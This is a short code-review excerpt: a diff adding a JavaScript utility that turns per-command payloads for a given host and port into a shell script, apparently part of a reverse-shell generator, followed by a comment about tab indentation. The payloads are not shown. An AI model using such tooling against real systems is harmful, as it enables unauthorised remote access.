src/utils.js

```diff
@@ -0,0 +1,17 @@
+'use strict';
+
+const generatePayloads = require('./payloads');
+
+const generateScript = (host, port) => {
+	const payloads = generatePayloads(host, port);
+
+	return Object.keys(payloads).reduce((acc, cmd) => {
+		acc += `if type ${cmd} &> /dev/null; then\n` +
+      ` ${payloads[cmd]}\n` +
```

Comment:
For consistency can you use tabs instead of spaces here?

Reply:
Ya sure.